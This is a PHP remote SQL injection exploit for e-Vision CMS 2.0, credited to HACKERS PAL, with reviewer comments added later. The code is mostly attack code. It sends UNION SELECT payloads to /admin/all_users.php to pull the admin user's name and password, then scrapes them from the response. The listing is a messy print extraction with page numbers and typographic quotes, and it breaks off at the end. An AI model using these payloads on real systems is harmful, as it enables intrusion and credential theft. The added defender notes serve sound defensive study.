1 #!/usr/bin/php −q −d short_open_tag=on
2 <?
3 /*
4 /* e−Vision CMS Remote sql injection exploit
5 /* By : HACKERS PAL
6 /* WwW.SoQoR.NeT
7 */
// NOTE(review): this listing looks like a print/PDF extraction. The leading integers are
// page gutter numbers, and typographic quote/minus characters appear where PHP expects
// ASCII ones, so the text does not parse as shown.
// Banner: prints the tool name, author contact and site.
8 print_r(’
9
/**********************************************/
10
/* e−Vision CMS Remote sql injection exploit */
11
/* by HACKERS PAL <security@soqor.net> */
12
/* site: http://www.soqor.net */’);
// Usage guard: when no target argument is given, print the usage text and stop.
13 if ($argc<2) {
14
print_r(’
15
/* −− */
16
/* Usage: php ’.$argv[0].’ host
17
/* Example: */
18
/* php ’.$argv[0].’ http://localhost/evision
19
/**********************************************/
20 ’);
21
die;
22 }
// All PHP diagnostics are switched off, so a failed fetch later on produces no visible error.
23 error_reporting(0);
// 0 removes the script execution time limit; socket operations time out after 5 seconds.
24 ini_set("max_execution_time",0);
25 ini_set("default_socket_timeout",5);
26
// Target base URL, taken verbatim from the first CLI argument; nothing validates it.
27 $url=$argv[1];
// The two request paths below both address /admin/all_users.php and place a five-column
// UNION SELECT in the `from` query parameter: the first reads `username`, the second reads
// `pass`, each from the `users` table row with idusers=1. The trailing `/*` opens an SQL
// comment, presumably to discard the remainder of the application's own statement.
// NOTE(review): for this to return data, the target script must build its SQL from `from`
// without validation and must answer without an admin session; both are inferred from the
// request, the server-side code is not shown here.
// Defender notes: cast or validate `from` as an integer and bind it as a query parameter;
// require an authenticated admin session for everything under /admin/; in web access logs,
// look for all_users.php requests whose `from` value contains `union` or `select`.
28 $exploit="/admin/all_users.php?from=−1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*";
29 $exploit2="/admin/all_users.php?from=−1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*";
30
/**
 * Fetch the resource at $url and return its body.
 *
 * file_get_contents() is used when the function exists; otherwise the
 * resource is opened with fopen() and read in 1024-byte chunks.
 *
 * Nothing here checks for failure: a failed file_get_contents() result is
 * returned as-is, the fopen() result is used without a check, and the
 * handle is never closed. In the fallback path the accumulator is not
 * initialised before the first append.
 *
 * @param mixed $url Location to read, passed straight to the stream functions.
 * @return mixed Whatever the read produced.
 */
function get_page($url)
{
    // Preferred path: one call returns the whole body.
    if (function_exists("file_get_contents")) {
        return file_get_contents($url);
    }

    // Fallback path: manual chunked read.
    $handle = fopen("$url", "r");
    while ($chunk = fread($handle, 1024)) {
        $body = $body . $chunk;
    }

    return $body;
}
52
Page 1/2
eVision CMS 2.0 all_users.php Remote SQL Injection Exploit
HACKERS PAL
09/22/2006
/**
 * Match callback: echo the first capture group, trimmed, when it is non-empty.
 *
 * Nothing is returned, so when this is used with preg_replace_callback()
 * each match is replaced by an empty string; the callers in this file
 * discard that result and rely only on the echo.
 *
 * The captured text is written to the output exactly as received, with
 * only surrounding whitespace removed.
 *
 * @param array $var Match array; index 1 is the first capture group.
 * @return void
 */
function get($var)
{
    $captured = $var[1];

    // Empty capture: print nothing.
    if (strlen($captured) <= 0) {
        return;
    }

    echo trim($captured);
}
60
// Two requests are sent, one per payload: $page should carry the username, $page2 the
// password value. get_page() checks nothing and diagnostics were disabled earlier in the
// script, so a failed fetch is silent.
61 $page = get_page($url.$exploit);
62 $page2 = get_page($url.$exploit2);
63
// Success test: does the first response contain a cell of the form
// <td bgcolor="#C2D4E8">...</td>? Flags: i = case-insensitive, s = dot also matches newlines.
// Only $page is tested; $page2 is printed below without a check of its own.
64 if(preg_match(’/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is’,$page))
65 {
66
Echo "\n[+] User Name : ";
67
// preg_replace_callback() is called only for the echo inside get(); its return value is
// discarded. Every cell that matches is echoed, not just the first one.
preg_replace_callback(’/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is’,’get’,$page);
68
Echo "\n[+] Pass Word : ";
69
preg_replace_callback(’/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is’,’get’,$page2);
70
// NOTE(review): whether `pass` is stored hashed or in plaintext cannot be told from this
// script. For defenders: if a request of this shape appears in the logs of an unpatched
// install, treat the credentials of the idusers=1 account as exposed and rotate them.
// Prints the closing banner and ends the script.
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
71 }
72
73 Die("\n[−] Exploi